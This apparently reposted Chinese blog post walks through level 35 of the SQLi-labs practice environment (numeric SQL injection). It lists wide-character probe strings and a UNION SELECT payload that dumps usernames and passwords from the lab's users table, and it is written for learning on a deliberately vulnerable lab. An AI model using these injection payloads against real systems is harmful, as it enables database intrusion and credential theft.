當(dāng)前位置:首頁 > IT技術(shù) > 數(shù)據(jù)庫 > 正文

Sqli labs less 35
2021-09-10 18:19:32

本less的考點(diǎn)是數(shù)值型注入

1.常規(guī)方法測(cè)試,提示無報(bào)錯(cuò)但1被轉(zhuǎn)義

?

?

?2.同上利用寬字符進(jìn)行注釋測(cè)試%df

?id=1%df'--+
?id=1%df')--+
?id=1%df'))--+
?id=1%df"--+
?id=1%df")--+
?id=1%df"))--+

?

3.直接用 ORDER BY 排序,網(wǎng)頁回顯正常數(shù)據(jù),確定是數(shù)值型注入。由于數(shù)值型注入不涉及任何編碼問題,因此轉(zhuǎn)義操作都沒作用。

?

?4.爆出用戶名密碼:?id=-1 UNION SELECT 1,group_concat(concat_ws(0x3a,username,password)),3 FROM security.users--+

.

?

本文摘自 :https://www.cnblogs.com/

開通會(huì)員,享受整站包年服務(wù)立即開通 >